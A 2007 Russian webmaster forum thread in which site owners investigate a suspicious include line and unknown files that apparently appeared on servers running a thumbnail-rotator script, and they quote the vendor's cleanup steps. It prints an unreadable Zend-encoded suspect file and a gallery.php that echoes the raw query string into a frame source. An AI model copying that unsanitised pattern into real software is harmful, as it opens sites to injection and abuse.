пьяный мастер
С нами с 06.09.05
Сообщения: 11907
Рейтинг: 5835
|
 Добавлено: 26/09/07 в 17:42 |
<!--#include virtual="/st/db_structure.php"-->
Нашел такую строку во всех темплетах и фаил db_structure.php 15 августа появился везде.
Че за нах? )
Последний раз редактировалось: X-dream (01/10/07 в 20:55), всего редактировалось 3 раз(а)
|
|
|
|
| |
С нами с 10.10.05
Сообщения: 785
Рейтинг: 783
|
| Добавлено: 26/09/07 в 17:44 |
че в файле то окажи 
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11907
Рейтинг: 5835
|
| Добавлено: 26/09/07 в 17:47 |
| Цитата: | Zend �2003120701 �1 �2326 �8227 xщ
џ2�µZЛЏЫЖ�з:�x»Ы лS/=(F6’�ЇДб�9¤m9Шмj��ј+GЦ¦N�T %JK["eЉ›}ДнЅ·\Њж’cs-ђ^zКяђC‘Ј��ЪўИ)�‚Ъѕt†Џбђвлв…aQњЯМч˜щћ#кь?5¬QҐmС@гTј?_4¦“uMЦ *©„1/
�ќОf�
}4r葧�g8Ћн��cn;®iM~Ѕ
T¤ЄЄ(ЄИ›1wЊЙ`¦»Г“
К�ђ�к“Иlo„LњкCcc�)@STYт}ШШњ��гЬ\ё‹
iHEІўI4‡Ў#3Чњ��’€�†ў¬b*�}µ�T(AUA^ѕ}bиD¬u�A�`EуЮќZSУzL˜�1б�!Uў…ќ='z0�тZ�U� MUиk‡,аїV$� Њe‰&щc
Я PF@C@БtЭсpj/Њ
Qj2TdПћ�R:jШяЏ°x±жЫuш±�e��]…к–„GБ�ЛЅЧьН .ѓј9€yЊ�н�УЇxиЯ2rЂ‘“јІ��Gᇵ+q�ґuxїУЮв‰"б/I·HЬOпгv/¤%QРЇТЅўм{Еc2c°sР>кыиy0—П��ЅпcЖ�?B1љЧЦВєВ_…Ё™“нu�Ы�иEY¶=фЧ№�*CрЫT‚$©х�омо¶пх�wwЋ�Ћ ]
КҐъQ�ЄЇs©>�мw{їЯйнµчи“?еЛ\Є«eЁю”®\e‰Є�я.—вЛ2�{й�UџbЉ”щGhї�НХtљ(AіМ zQ†ЮЛФ��€шqg§МЎщ¶�Ўэ\e> ©Оaзи`°Ял�ъ�ћЅ1{TВд*AсХ›2Иpыvпv€х�:ч|рЖ›2ЕРгЬлu�|вщќ7l…$'ж�оvЏЋЪ»эNч€™ў˜Mц��W$�W D(D(L©9Њ)Мє�о�
{ЭЭгCЄц^·Ыч±яЌ•4PэЎЦш]ќл©(B…х�xЁ,Фљ�Ф·|ИЏ!�\>�Д�%��ЃРдг’"ь'6N·L��ѓэОЭц`°и;ґЬ…�ьjB®xѕ�2�)фYђPnЖrxџе‹4e�…е�˜ЩiЋІ1;* ¦H±еa�G;‡m�©�Є��я.R5fЪJQ5�ѕЙU5fщБf8�rѓЯ—U,�ѕКT,�fЛЉЕ
wЉUvZў
чUAKbOR^(µаьЁLи�ЎФт§EН9-jЪiБ
�™PZ”a�„0�jd��KbiВХ\±4&vЉXљ°RV,M°2ЕТТ<�IиЩ^С�с №P ЧЩЩYR(
_Й“Љ�®fЉEG�JКE±П�Њ�ю5E2�4‰I�RьЋ/YЪ~Qь7щўЃ�лўЈeН‹bїК�
p��"С '�Lъ� lmrKА�?�…w·М ‘нfииџ�K�Љъ9=$�ЎЧюиё}ї?8оu�иЈМВ…Ћ>/U№Pдіµ·0ЊGX�8ЕDҐ�Њt‡ЎВA^�є}Љz™еч{нГnї=ШЩЫл�РO’ЮјйОжНИп{�f8юЖ%Б�˜•Ь-yѕД WкGе«Ї¤d��УQqцCm%Ј� ЪuЅц~»Чо�ШWko© Љ�pk-Ч ~»/N1µ�!ыxщд<@\+ у�Ы}Дv_�"в ЇKмѕМ
ЉВЭ—…�оѕ,<,Ь}™yџґЭ—…�гlsЭ�~лeЎН.НD®«'‡Њ\°«�™л§�ѓ0Ю™зЪцdрЛ�{ НGоX‰4�ХHуKi ,
»ърДШЮµ-Ч±§7+–ЅЅpmЗёAџ†tмFevєp·�Г»_С]#¦•0UдЪ0~зЉW‰"ь-Ќ5™%‚4’Ї$"…"ЬsфЙLЏxЉ�ЖЃ1ж�ЖВнШЄ«
q\$фњО�Лmњ9¦kФ®‡·WХ�ЧќЯl6'ъtєнШ§®б4�љ—MУjМOж�иг±9jќШУ‹‡єSђзк“3ЪЏ«V\Э™�.эn�gХКВЅ˜�кИ\ђЁsqУІ-Јz§A/Е®ЧoЅЅОиЫЦМ>]�#ыМjЌOЎkЪVюЕЫлжёRcЁЎm?6Ќ†iЌЊуоёV%–Ш�Хz«µ
(Ц~шЁ%Ютз�џУ �gШ&з’>єъдHџ�Vu§ZЇPh�Bf�У…QIќ>Ч�тqdЏЊ�+qиЂ�‚Єјч��7Ё‚��Cw†'µжВҐ
}J4Ь�NМ§Гsц•~NlпcиЌ№3Ш4лwZb j#®jBиsЭ©�зsУ1�-тЄІGNhЌЄ9xIЁє}bўµры$ш^џ¶Zй_lS|u·|5ЯЄМuч¤ХјЕHTЯ���®}pШїп:¦5с��„€�µлl9B-РП‡�ќQ-<2хЖpj��ЧкЧoTдЂ…?†я8Џ ��M13�
IМЄ!.�M Єl4%РВhJ0…С�вјh
S�Шпos��щJGЌДЗQц�“ҐNИmЊ˜љHжЈ¶9OMетшШе©O'Jдµ€��іњ�j\v
–�Ц�ЩiФЈзyР‚јT$kHI�4б‹шќ±,мпЬЅПЗp‚щ03†ђБЇ—b€ЖП}�јЯL\M7�WьkЪпИ��ЗW@L��рЇФ�Ђ�.`�-рЛrкЌd (�$QЦiВЦgЮ±{7VN�`TЯIЙ”—Њ®$тЄЊ”— _1¦Гаќ`ъќе¬�Й€ЭЋPИџв?“�Ћйfґ;Hд�fйьђСзс¬,=�Ў��~ҐґњaђБІм�.e'dшiжбсФђ<<�JА‘��Y‰+A,Ї�1] �^ѓЂ®…њ„�т: $‘Z��дЛHЮ�PZ3{)YFYЭl–,#Ї“ќХ‹¤Г,-
~ еkL“ўc#УЖl‘sG2kP�9w�н�9w‚‘Љњ;БьђіMr"У$�g1г“�MЈрf’7;™л�Б„+$ѓ�‘тBGЎ`QЉ"#RёF�\вQIЬHІ‹Pю()‰2џ�_·�CЗњ»�’ыґё’�eґ�йЮЮ№Эф'Э ђП’К‹6�'K5$��Ъ}�"ГЊ:
—гуE ±–ПћВ°_Ldµ˜Иo’?'ђёщ‰�б˜�ъї,Ј?�@ґчwщДЧП�1�M•Ѓ$z}и�Э�MЌu¬"IВXЦ(љ:ЅuRMKP’‰ІИТгіu A�Ђ¤"ЃmИя�з>Њх |
|
|
|
|
| |
С нами с 10.10.05
Сообщения: 785
Рейтинг: 783
|
| Добавлено: 26/09/07 в 17:56 |
а ты уверен что это не ихнее у них там случайно автообнавления нету ???
потому как еб... в зенд запихивать что-то на хак не похоже
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11907
Рейтинг: 5835
|
| Добавлено: 26/09/07 в 18:03 |
сеичас делаю апдеит на новую версию 5.68 и тот фаил исчезает.
|
|
|
|
| |
Осень .... опять в школу ;-((
С нами с 01.05.04
Сообщения: 6518
Рейтинг: 3998
|
| Добавлено: 26/09/07 в 18:07 |
у меня такого нету ..посмотрел
|
|
|
|
| |
😈😈😈
С нами с 17.08.05
Сообщения: 3966
Рейтинг: 5534
|
| Добавлено: 26/09/07 в 18:44 |
st/admin/rotator.php?action=tools&action_submenu=filecheck&domain_id=1
чек зыс аут =)
|
|
|
|
Diablo.Click - T1 ским трафик напрямую с тубов от 0.5$ за кил
|
0
|
|
| |
😈😈😈
С нами с 17.08.05
Сообщения: 3966
Рейтинг: 5534
|
| Добавлено: 26/09/07 в 18:48 |
блин ,
зашёл щас проверил у себя .
у меня gallery.php какой-то =\ 15 августа - дата появления.
gallery.php - unknown file
| Код: | <?
$g = getenv ("QUERY_STRING");
?>
<html>
<head>
<title></title>
<!-- frames -->
<frameset rows="100,*">
<frame name="" src="top.html" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
<frame name="" src="<?php echo $g; ?>" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
</frameset>
</head>
</body>
</html> |
содержимое
|
|
|
|
Diablo.Click - T1 ским трафик напрямую с тубов от 0.5$ за кил
|
8
|
|
| |
😈😈😈
С нами с 17.08.05
Сообщения: 3966
Рейтинг: 5534
|
| Добавлено: 26/09/07 в 18:52 |
а %)
if you do not use "st/gallery.php" file to open galleries in frame, delete this file (we removed it from ST because of frequently abuse of this file as place for malicious code - "tools>filecheck" can't check content of this file)
отмена тревоги тогда =)
|
|
|
|
Diablo.Click - T1 ским трафик напрямую с тубов от 0.5$ за кил
|
8
|
|
| |
С нами с 07.06.06
Сообщения: 295
Рейтинг: 210
|
| Добавлено: 26/09/07 в 19:40 |
gallery.php это нормально удали его, я из корня папки ст удалял
"# if you do not use "st/admin/galery.php" file to open galleries in frame, delete this file (we removed it from ST because of frequently abuse of this file as place for malicious code - "tools>filecheck" can't check content of this file)"
X-dream
вот это сдела у себя?
2. Check admin login/pass under settings>users and remove unknown admin users. If you have access over phpmyadmin, you can display all users from database by running "SELECT * FROM st_users;" query and delete unknown entries from there (because some entries may not be visible from st admin)
3. Check st/admin/.htpasswd file for logins which are unknown for you
4. Check for suspicious files over tools>file check and remove them.
5. Change FTP/SSH and MYSQL logins for all databases on attacked server
6. Enhance your security by following these instructions these instructions
http://www.thumbsrotator.com/help/manual.php?action=help&cmd=help_list&value[pid]=149
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11907
Рейтинг: 5835
|
| Добавлено: 01/10/07 в 20:56 |
<!--#инцлуде виртуал="/ст/дб_струцтуре.пхп"-->
Вобщем убрал везде этот инклюд и трафф пошел вверх... ... на всех сайтах... хз... совпадение может.
|
|
|
|
| |
